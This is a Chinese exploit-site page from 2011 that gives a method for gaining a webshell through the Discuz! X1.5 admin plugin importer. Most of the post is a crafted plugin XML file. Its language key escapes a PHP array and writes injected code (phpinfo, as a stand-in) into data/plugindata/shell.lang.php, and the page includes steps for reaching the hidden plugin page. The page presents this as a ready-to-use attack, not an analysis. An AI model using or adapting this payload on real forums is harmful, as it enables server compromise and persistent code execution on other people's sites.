首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
DZ-X1.5 论坛最新后台拿 WebShell
来源:vfocus.net 作者:vfocus 发布时间:2011-04-14  

Discuz!X是康盛创想(Comsenz)推出的一个以社区为基础的专业建站平台,让论坛(BBS)、个人空间(SNS)、门户(Portal)、群组(Group)、应用开放平台(Open Platform)充分融合于一体,帮助网站实现一站式服务。

先看下 shell.lang.php 的文件格式,X1.5至少副站长才可以管理后台,虽然看不到插件选项,但是可以直接访问:/admin.php?frames=yes&action=plugins,添加插件。

    在插件,安装新插件,地址:\data\plugindata\shell.lang.php,必须要有 php 环境的配合。

----------------------------------------------------

EXP 保存为 .xml:

----------------------------------------------------

xml version="1.0" encoding="ISO-8859-1"?> 
<root> 
        <item id="Title"><![CDATA[Discuz! Plugin]]></item> 
        <item id="Version"><![CDATA[7.2]]></item> 
        <item id="Time"><![CDATA[2011-03-16 15:57]]></item> 
        <item id="From"><![CDATA[Discuz! Board (</item">http://localhost/Discuz_7.2_SC_UTF8/upload/)]]></item> 
        <item id="Data"> 
                <item id="plugin"> 
                        <item id="available"><![CDATA[0]]></item> 
                        <item id="adminid"><![CDATA[0]]></item> 
                        <item id="name"><![CDATA[www]]></item> 
                        <item id="identifier"><![CDATA[shell]]></item> 
                        <item id="description"><![CDATA[]]></item> 
                        <item id="datatables"><![CDATA[]]></item> 
                        <item id="directory"><![CDATA[]]></item> 
                        <item id="copyright"><![CDATA[]]></item> 
                        <item id="modules"><![CDATA[a:0:{}]]></item> 
                        <item id="version"><![CDATA[]]></item> 
                </item> 
                <item id="version"><![CDATA[7.2]]></item> 
                <item id="language"> 
                        <item id="scriptlang"> 
                                <item id="a'"><![CDATA[=>1);phpinfo();?>]]></item> 
                        </item> 
                </item> 
        </item> 
</root>

----------------------------------------------------

 



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Siteserver CMS 最新批量拿站 0D
·phpwind (manage.php)SQL注射
·Phpspy 2010 shell 身份验证绕过
·phpcms的另一个phpcms_auth函数
·ShopEx V4.8(v4.84,v4.85) 后台
·简单文章管理系统 cookie注入漏
·烈火文章后台管理系统V2.1 0day
·睿智企业网络管理系统 3.7.7 后
·电大在线在线远程教学平台0DAY(
·色影空间摄影管理系统4.0个人版
·英雄宽频WEB站任意下载0DAY漏洞
·PHPCMS 2008 SP2 本地文件包含漏
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved